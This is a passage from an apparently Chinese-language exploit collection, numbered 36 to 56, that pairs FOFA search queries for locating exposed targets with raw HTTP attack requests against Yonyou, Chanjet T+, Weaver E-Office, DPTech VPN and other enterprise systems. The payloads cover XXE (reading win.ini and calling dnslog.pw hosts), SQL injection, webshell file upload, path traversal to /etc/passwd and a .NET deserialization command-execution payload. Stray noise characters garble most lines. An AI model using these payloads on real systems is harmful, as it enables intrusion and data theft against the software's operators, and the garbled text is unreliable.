User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info$ |7 u2 B6 `* v* ^( X
Accept-Encoding: gzip, deflate
% U4 x4 l2 }1 n1 Q% zAccept: */*
" k; b# r5 O. r- l cConnection: close
$ E7 w. U8 _* `( N2 daccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
4 @/ [9 W+ ?9 B3 {0 C( W2 OContent-Length: 190
, d* O2 \. h, ?! }5 G2 `6 v( jContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0$ C0 }' Z/ N/ Y3 n
+ c+ B% |, b& S0 i1 T3 ?3 \) ^--fd28cb44e829ed1c197ec3bc71748df0
1 A$ @& T. n3 w, GContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"/ o% M7 s Q$ ?: r% K! }; O
% i4 c+ v; l* T, i! q) r. f N<%out.println(1111*1111);%>) q- d. }; k2 K4 j) k$ s
--fd28cb44e829ed1c197ec3bc71748df0--8 b9 ]( ^% J6 b/ f% s8 c
( A) u$ U! g h/ s
+ T# s9 ]8 |, Z& X* a+ `% b# a7 @& q36. 用友NC-Cloud soapFormat XXE
/ ?" ?+ X+ i; V! L3 y2 u0 PFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
% V; c" R, e. i* M3 lPOST /uapws/soapFormat.ajax HTTP/1.1
+ A1 e ^2 f! t! j) \% G2 |& OHost: 192.168.40.130:8989
- F) _+ U6 C6 Q0 P/ `1 a6 b9 E& ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
: w: D8 P* G. b, nContent-Length: 263& `+ P* Y+ V" k6 c/ O# R8 t6 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: x2 R3 S# r, l- ?: ^, t0 X
Accept-Encoding: gzip, deflate
|/ X* k; B5 i1 I3 i D* mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 U: A0 i1 u1 w/ S# y0 Y; h
Connection: close
, L- S: e, E. f+ ^Content-Type: application/x-www-form-urlencoded
. _; ?6 z# E, s+ x- I* ?Upgrade-Insecure-Requests: 10 m* }& M3 y; S# X( @
9 b- U8 |0 g8 F3 `! g
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
1 ?* D" {* q9 \; F2 h
$ t4 \3 \, m& ?3 S8 Z+ i
2 J5 l% g' C6 O) y6 E' @& n37. 用友NC-Cloud IUpdateService XXE
W' V7 z* p: O. r3 Q$ xFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"! A9 b2 E+ g8 e7 p# D( Z
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.19 {% s6 r- c) `: [5 S1 e! k( V
Host: 192.168.40.130:89894 x2 W8 i% R/ E" u7 o4 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.366 {7 C \: \7 a; v; b* ~" ~
Content-Length: 4213 O8 m. c' ] Q5 j" l; [4 H7 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 o' Z/ s% B' Q3 v% k* tAccept-Encoding: gzip, deflate% ~! d7 d( G' y+ O- H u# u
Accept-Language: zh-CN,zh;q=0.9. U. \" @( i$ y! [1 ], O$ H" x
Connection: close
9 y8 \0 N) |# |) K2 hContent-Type: text/xml;charset=UTF-8( ~! l7 g8 u& e' ^0 ~
SOAPAction: urn:getResult0 f( Z2 H" M' B- U' U0 W+ z& |
Upgrade-Insecure-Requests: 16 |/ e! P# q8 `7 n
" l/ M* d& K& d9 g<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
6 I( x1 R, p1 ~2 W<soapenv:Header/>
: B+ z4 x6 e0 Y+ E" ~<soapenv:Body>
! v, p) q' N" `/ ?; g- E) e: ?<iup:getResult>% K8 b7 @+ ^# U# P
<!--type: string-->
# g. e) m% _! [0 J; r/ p7 g" B<iup:string><![CDATA[1 B7 P. I6 J: C; L
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
6 {" u. l. m. F5 n& U l' f4 M) |% @<xxx/>]]></iup:string>
9 H3 o* @$ F% Y6 b6 ~+ ~</iup:getResult>
9 n9 C- H- c6 Q; I! O. }* G' P</soapenv:Body>
M8 Y- C6 s1 W. p, W</soapenv:Envelope>
: |$ M- e: N i. Z$ ~
7 k7 R) q- b6 P* h6 V8 s
+ K# F; m% F8 w1 Z' Y: F+ D2 C
7 [, x/ n" f \+ |* _38. 用友U8 Cloud smartweb2.RPC.d XXE
! n3 I4 ?) n4 v' qFOFA:app="用友-U8-Cloud"* U* ]) ~" x+ b2 X
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
& y8 i" h3 B6 }' n/ Z$ ?$ MHost: 192.168.40.131:8088 C# R+ F& Y! M4 Z5 c! k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
4 P# Z/ U M _/ VContent-Length: 260
* _) Q' N8 J0 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
& y* o9 T. _# Y( i. Q3 a8 qAccept-Encoding: gzip, deflate
/ j( i# {% ^! @; v; e1 G2 j/ YAccept-Language: zh-CN,zh;q=0.9. z" O3 t, u, \
Connection: close
7 p/ o1 i' z4 n4 DContent-Type: application/x-www-form-urlencoded
+ N" p; n& Y% A" v" J) K4 n2 e" z. Q6 i) {$ u5 v
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>$ @; R" O. E* R+ j2 X
+ T/ T6 |! ~5 W& K* ^ t' J
" q& s+ d# w- }39. 用友U8 Cloud RegisterServlet SQL注入
+ W. U3 i6 n$ `9 Q; o2 wFOFA:title="u8c"
2 V# `* S; s( n( n4 }1 M) iPOST /servlet/RegisterServlet HTTP/1.1- c e& _" W& x5 l+ _. d" p
Host: 192.168.86.128:8089
1 u! k6 G, R! i1 Q0 v O. uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
4 F: ~; s3 [; L1 O& W& p- EConnection: close! d3 ]7 c2 r5 P; T
Content-Length: 853 ]6 j7 A' d6 h9 F* u. }' X/ {
Accept: */* G* b3 {! E' R9 a! |1 m: c' v
Accept-Language: en& z5 m) J E1 ^6 ]
Content-Type: application/x-www-form-urlencoded
! ]7 R8 R/ r W8 s; h1 z% EX-Forwarded-For: 127.0.0.1
1 S& m! e K6 @7 Y" u& Z) v; N5 B& |Accept-Encoding: gzip
) ^. V, D* N! b; u+ r/ G9 b4 ]2 X/ M% g3 a$ [9 d; Z
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--! F( ^+ ?( I# x% ?
- B; I7 f- e' |; J: ~& y% @5 M
/ i- ]9 d& v; ?# C" @( f$ a40. 用友U8-Cloud XChangeServlet XXE
! Q8 h" i- v8 R; Q: jFOFA:app="用友-U8-Cloud"
, ~4 s# y4 P1 j( k2 s: YPOST /service/XChangeServlet HTTP/1.1! Y+ V, i, S m( f
Host: x.x.x.x
4 E0 t0 P7 U8 r& \User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
! P" p- W7 X8 QContent-Type: text/xml/ f E* P! [( m; ?9 ]5 z7 \
Connection: close7 @4 l. _: [- z
2 d3 x$ I! B$ s+ N! o" ]
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>% P, |3 L) B6 u2 O" v
3 v# L2 G$ h2 d
2 E- ]" `/ y% p1 `& z c; |5 V, _41. 用友U8 Cloud MeasureQueryByToolAction SQL注入; S8 k2 x5 A8 ?6 w* \2 Z. B
FOFA:app="用友-U8-Cloud"$ J6 Q9 C8 {# y( _2 l
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
$ y& ~, [: h" l& j3 V6 eHost:2 F7 Y8 J5 w. M0 w9 b6 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 g5 q% D1 g3 z6 fContent-Type: application/json2 F# {7 r5 A+ I, M& O
Accept-Encoding: gzip
- ?4 `+ ]6 O& aConnection: close8 p5 K o4 k0 N+ P9 {( ?; m
! b8 X- D! J# `0 I$ D, q# [6 W
$ S* u# n, t/ [3 [9 R! \+ E: S, [42. 用友GRP-U8 SmartUpload01 文件上传
$ A) r6 X2 @7 R/ y$ T: v( sFOFA:app="用友-GRP-U8"
/ D0 q! D3 {# X: f) {POST /u8qx/SmartUpload01.jsp HTTP/1.1
# i, W5 @ W2 `# F. P9 L6 Q- fHost: x.x.x.x& ~9 {) `# S% V% W
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
( y! p* W2 u* H0 zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
0 Y# J. t& x5 p- `9 S: B
y7 Q A# A) m: F& o8 F+ W& a; APAYLOAD' l( Z( L+ p8 a1 q/ \" q- T- o6 S/ n
6 G$ Y5 Y1 N9 K1 I* P
1 W2 Y/ V2 D) T( K2 jhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml$ x, ?7 [7 L0 j
H' n7 o8 A" l0 d6 P' F
43. 用友GRP-U8 userInfoWeb SQL注入致RCE6 F3 t: J1 F9 \6 H; p* x+ O% M
FOFA:app="用友-GRP-U8"
/ ~6 r$ n& s* K2 [) K: k0 U KPOST /services/userInfoWeb HTTP/1.1. `; E7 n3 a9 B$ r
Host: your-ip
- P- ^9 Q* B8 v% n3 e; BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.365 i. z! v: E, E. r& U$ A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 ?/ R" c/ I- P+ W: L
Accept-Encoding: gzip, deflate% L% n1 G* [* W* t
Accept-Language: zh-CN,zh;q=0.94 k& J- [4 W$ J# ?8 q) e* W& Q# p$ q) L
Connection: close
# O! n* A/ L5 ^- k0 JSOAPAction:6 T- }: Z. K. Q# C0 b8 P2 C% u3 |
Content-Type: text/xml;charset=UTF-80 X" G# Q& L; ]
* H- n( C3 l8 d: l; |* C% O0 m<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
2 C) _ J# P* A& a- @) @ <soapenv:Header/>: ]8 [( H2 M# V& B. g8 U: j3 Z, q$ @
<soapenv:Body>4 i7 j" E; i2 w) w: b4 w2 B+ [0 l
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"># W6 p! I( y! R( u$ U o
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
) m# K) ~( k& {: H7 K( h2 j& J </ser:getUserNameById> c* B0 i* E& i
</soapenv:Body>0 T) O/ k- k' A* K
</soapenv:Envelope>
/ K$ P+ R8 T# b, c+ H" n; x7 H7 V
s/ m( w6 `" y
; C3 H# x0 k. B2 Z44. 用友GRP-U8 bx_dj_check.jsp SQL注入
0 i V- M! i& K: g2 D( EFOFA:app="用友-GRP-U8"3 {* }7 ~* N. @2 c' C' Z
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1 H$ z; Q0 R, H# F: x8 s
Host: your-ip
" l& m5 S) e7 v' a% UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36& X) g9 _+ u. y! x8 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 U" ]9 u$ y0 m+ ~5 _
Accept-Encoding: gzip, deflate" k( X e q. e7 o; U$ ]
Accept-Language: zh-CN,zh;q=0.96 o( C7 t% s7 Q. k; e3 P
Connection: close
( d. j- A% F+ k' K* }( \
" {% m0 I5 t5 K+ T
3 ]0 I _ a9 n$ I45. 用友GRP-U8 ufgovbank XXE
/ G! m/ r$ U4 U1 `( f4 o& RFOFA:app="用友-GRP-U8"
1 A( I' H& X: g" i0 o: t5 w+ v, RPOST /ufgovbank HTTP/1.1
8 X7 j) a" }. T3 EHost: 192.168.40.130:222- {4 m0 F4 o; E. W3 y2 w4 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0# [) j6 b3 n' B' {8 [# l
Connection: close$ t! G* ~* V8 @3 s3 p" D
Content-Length: 161
" Y D0 ?6 q) F) rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 l/ R" ]9 m: S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 E: Y- [7 T: E- B* @6 O4 eContent-Type: application/x-www-form-urlencoded' z" |6 O! d$ ]
Accept-Encoding: gzip
# P3 z- [) Z. y b2 ^0 H$ G8 t& J' `9 l* T' {+ I
reqData=<?xml version="1.0"?>
3 V; Q! a+ E4 C. r# w6 T<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest1 L6 K) r, l# @! a
- @) Z' A" m" {) R+ g7 A+ {$ @
! |0 o. [- {, h% |6 [
46. 用友GRP-U8 sqcxIndex.jsp SQL注入' {2 R5 h: ~. X" y9 I
FOFA:app="用友-GRP-U8"
. i: P, _: i4 hGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.14 g1 W& y$ O. X2 Z1 o
Host: your-ip' j- d( Z( n$ B+ u$ a$ L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.368 S; K6 N8 @# A/ J7 x7 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- V- D7 n! l$ S+ I# v. t# {, [Accept-Encoding: gzip, deflate) u# z, g) K# x! @ X
Accept-Language: zh-CN,zh;q=0.9+ d1 U" f" ~; n Z- o" ?5 J% K4 H
Connection: close
1 Q: W8 q) \( Z) N! m7 l
* t5 q8 W9 |. j* q: p
. L. L, X. T; |47. 用友GRP A++Cloud 政府财务云 任意文件读取
7 a+ P- f! \1 f y1 t2 [5 aFOFA:body="/pf/portal/login/css/fonts/style.css"
, G7 I- k# y6 CGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
7 T5 q" F+ }! N) h# {Host: x.x.x.x6 i! S- ?' V5 ?! i3 N$ ?, A4 b
Cache-Control: max-age=0, t- z, w/ Q* @9 ]$ {+ U
Upgrade-Insecure-Requests: 17 B6 F3 o# d& h7 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
: ]+ _9 o& v8 f6 s1 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 L- b1 ^/ M8 _
Accept-Encoding: gzip, deflate, br
6 b. g4 m$ l7 F6 g, h. MAccept-Language: zh-CN,zh;q=0.96 s2 C9 l' @3 d, z
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
4 r2 s$ V* |% o3 kConnection: close o( v, Q9 V& d- s X+ q
8 C0 N+ E& y) U. u" n' E ^, m1 w x3 J9 c' O' w9 A, U8 k0 a0 f
( O& X6 [7 s) w4 s
48. 用友U8 CRM swfupload 任意文件上传, O$ d* ^' X0 G8 m
FOFA:title="用友U8CRM"
+ G$ B. K" ]$ y4 D4 }) I: tPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
$ ^" H( H8 s2 X- L' {( `Host: your-ip( |! M! i, P+ I+ m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( m; ]8 b- }$ h. j' m5 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 Q5 R6 f. N- E$ ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, y8 T0 P. p2 IAccept-Encoding: gzip, deflate2 I4 |" c1 Z$ P5 J& u1 ^# _; z
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
: w7 \" `. \. H/ Q s @0 s( Z! I/ [, E------269520967239406871642430066855
" L' z: Z. a0 B) z4 cContent-Disposition: form-data; name="file"; filename="s.php"" z" ]2 ^2 x5 d& j
1231
- ^' I( x/ a4 [ h' b6 y; ?/ K8 VContent-Type: application/octet-stream
0 v7 ~: }6 X2 j1 s------269520967239406871642430066855
' ^% z. A$ `9 K0 E- FContent-Disposition: form-data; name="upload") {( F3 Q7 ]$ O$ ]6 K+ n! a
upload
) a1 `/ @, z, T6 I1 `1 ]------269520967239406871642430066855--
, N* {# l( B- q5 U# K- T' V# M3 v d# S W0 n9 x' W1 O
5 ?& s$ A/ _ m" W9 J ]49. 用友U8 CRM系统uploadfile.php接口任意文件上传# ]) q L/ a5 U; s) ^; F3 w
FOFA:body="用友U8CRM"1 O4 }- a& U* `
7 S3 }8 T6 C( k" K+ ^
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1' @, E3 D( v4 P N7 p
Host: x.x.x.x ?9 V2 _. ?7 ^ w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, w8 _/ ], }0 ?8 ^+ C5 x( D
Content-Length: 329
" F* R% @9 ~: hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ ?) i. N5 B# a8 x/ n* I. ]2 `Accept-Encoding: gzip, deflate
* T& G7 h! W3 D, h7 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 u: m" ~# m" f/ s0 b) QConnection: close
/ m+ A* a8 t" C; s9 A2 `Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
0 S( |+ z$ x2 ^4 Z/ u! v
; {. f# l' Q9 d. \4 j, P4 _: X-----------------------------vvv3wdayqv3yppdxvn3w7 O# [ P$ [ i: Q9 S/ o
Content-Disposition: form-data; name="file"; filename="%s.php "" R/ H r2 G4 `* i7 ^+ j, L
Content-Type: application/octet-stream
' Z' t. g2 S# F$ {1 k7 d. B: @$ _# w d/ @. I/ E# C7 p) P
wersqqmlumloqa
6 o4 W$ q+ j! a3 v2 X) q }! p-----------------------------vvv3wdayqv3yppdxvn3w* h8 J- k9 Y8 A0 Q" Y! M3 F
Content-Disposition: form-data; name="upload"
$ t' ^7 p2 C7 U+ N. b6 N a. H% w9 e0 _4 R1 W$ \- e2 t1 P2 @$ g
upload
9 E: S' y0 D: o% B/ L* Y-----------------------------vvv3wdayqv3yppdxvn3w--
4 n3 L5 `( u: ?& z7 T6 m
6 e2 g2 {5 `* h) H. ]* t& {( F$ |: h/ c( \0 u( t& @ c
http://x.x.x.x/tmpfile/updB3CB.tmp.php1 k' g6 L9 h- W, V2 t3 k
0 F2 ?) H2 v1 f, j50. QDocs Smart School 6.4.1 filterRecords SQL注入
7 b, [# Q3 T3 S" CFOFA:body="close closebtnmodal"
% `- b3 s5 C }POST /course/filterRecords/ HTTP/1.1: a" X* \* u5 I: O+ [
Host: x.x.x.x
) e3 Q u5 B& zUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.364 J: q/ P" X. n0 X* B
Connection: close" N$ S3 h1 A! Q4 [6 O& N! E" B3 h- g
Content-Length: 2248 c+ Y- O$ h3 _! U- C1 x5 v* I
Accept: */*, M2 E4 o/ l0 p' `
Accept-Language: en1 Y; O" ]. Q: z/ h" H. {
Content-Type: application/x-www-form-urlencoded
1 n& _. Y; E* K, q3 ` P" i' BAccept-Encoding: gzip
* T+ J5 a5 q$ y+ O5 i0 m3 _5 ^/ A* x
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
. R" A+ [9 x: V) _
* F* \/ r9 c5 Z
6 K& }9 V2 z. d7 M51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入' x) z4 L7 k8 c+ T+ s- x; v7 H6 k
FOFA:app="云时空社会化商业ERP系统"
: d8 X' r3 {# u9 zGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.17 N7 D% s" Q, [3 Y: A1 k
Host: your-ip- s. T2 g( Z/ N9 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
5 U' M. V) X, P4 [' L, aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9/ A: q. ?* ^+ J& e/ N9 A! j, X
Accept-Encoding: gzip, deflate: O( J; u2 z) K
Accept-Language: zh-CN,zh;q=0.9
3 k- |( y; L) k4 b* Q/ q* n- OConnection: close* m Q4 p: O- c& T; o8 R/ m+ ^* E; ^
8 w+ c0 S& v- l+ W2 R
- Q4 M/ `, X. T* f* j52. 泛微E-Office json_common.php sql注入
, d* D6 }, @2 c: i1 l% O* r. \FOFA:app="泛微-EOffice". q4 H3 ^: G U' {0 e
POST /building/json_common.php HTTP/1.1
+ F3 Z$ n( a" u; kHost: 192.168.86.128:80972 I3 Y3 t$ j. U b# O; _1 W$ z
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* C" d/ p" Z* U+ O0 z0 NConnection: close {. b& e* N% W! v% T0 X. o
Content-Length: 87
* l7 J( Z+ W9 B2 E, R6 k1 WAccept: */*; j) B* r! V8 ^7 r; H7 }
Accept-Language: en M5 |7 @! I5 M6 U& @% C1 D' V9 b
Content-Type: application/x-www-form-urlencoded
1 |/ _9 ^! K4 O* kAccept-Encoding: gzip
$ u5 ]- z( b3 f& [2 {$ m% Z% E: l
L' E8 R! h, r' j7 l0 ftfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
$ ]8 \6 i7 m7 Z3 c( L: ^: q; w
6 M1 F+ s J' W+ j& N: e' a( }
# f$ u4 S3 g( w8 ?6 M53. 迪普 DPTech VPN Service 任意文件上传
& ?* M( t2 {7 |+ C8 [2 bFOFA:app="DPtech-SSLVPN"2 u9 ~7 K+ Y+ w" U! B
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" M3 x3 ^7 x6 D! G' y2 x
2 U; X! X0 |: }; }
- z4 g" N3 Q/ D( i: m54. 畅捷通T+ getstorewarehousebystore 远程代码执行
) ?$ l) {1 o9 `5 a/ [$ pFOFA:app="畅捷通-TPlus"7 F; U9 Q1 E8 p9 ]1 S! Q' R
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件: [4 n9 Y K8 Y8 P: r1 X9 A9 W
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
- m; q0 [( Y5 a$ B8 `/ A' I% t- T, P+ [% F h( \4 C, M
- y& G$ z" V3 E% x5 U
完整数据包" J7 B( T: T( [5 T8 Q5 r
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.10 M f: p# E# }# L# o
Host: x.x.x.x
6 p0 z2 ~. K8 E& Y3 oUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
6 S7 R$ Z0 l$ f- z4 z% IContent-Length: 593
$ ]1 r1 Y0 @. P! K- Y& V* Y) `! E' T8 w
{9 @/ j7 E% n6 c9 {6 ]
"storeID":{
% \6 ~6 w& {9 H1 ~ "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
8 o/ [2 Q- [! \8 r% R4 F/ G "MethodName":"Start",
8 G+ Z) y0 s: c0 N "ObjectInstance":{
& c/ q) U A. p, @' R& W "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
( O( l/ x9 t: y; ~* U "StartInfo":{
/ o* t' B5 I+ L2 T8 \ "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", F; i, \6 _' b
"FileName":"cmd",
6 e% y) ^' y; d$ h) X3 J7 U0 I7 r "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"( _7 \2 O9 }. c
}
5 c( j) R! h) L' O; m7 c }
0 E0 S! \+ T- a9 I9 `5 j }6 N4 C$ _ B/ c) @5 Y, z
}
# W- o4 T* J9 f8 t; v2 C+ q! {( _/ E, N" D. h z7 p3 b
/ x7 b) g! p9 b; v, A/ m第二步,访问如下url
" n: a2 d" P( H$ Y: g1 c/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
+ l1 Q6 b. L; ?9 h% p
) G- F& H: w3 Y) p5 m+ ^5 y9 r. B2 Y
4 @, @7 I$ T& b1 e1 v. }55. 畅捷通T+ getdecallusers信息泄露0 Q+ |6 U* H W0 t( i) d1 @
FOFA:app="畅捷通-TPlus"# O; O/ K2 F; L- h ^1 f$ b1 O
第一步,通过
% n( R3 S* ~0 P% O& ^8 y$ W B/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
( w i6 }/ W5 N5 O/ F3 `$ x第二步,利用获取到的Cookie请求0 U X. [ S+ u/ i3 P
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers& U( X1 m' s0 U2 o5 @' s3 @
2 a: W$ p7 S! \, k5 n1 ?$ J1 b& u
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
8 T9 N- J6 n- u5 ^, fFOFA: app="畅捷通-TPlus": ^6 P1 f3 ?6 C% @
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1- o" _0 G; ^0 h2 a( I1 i8 C8 \& b, |
Host: x.x.x.x
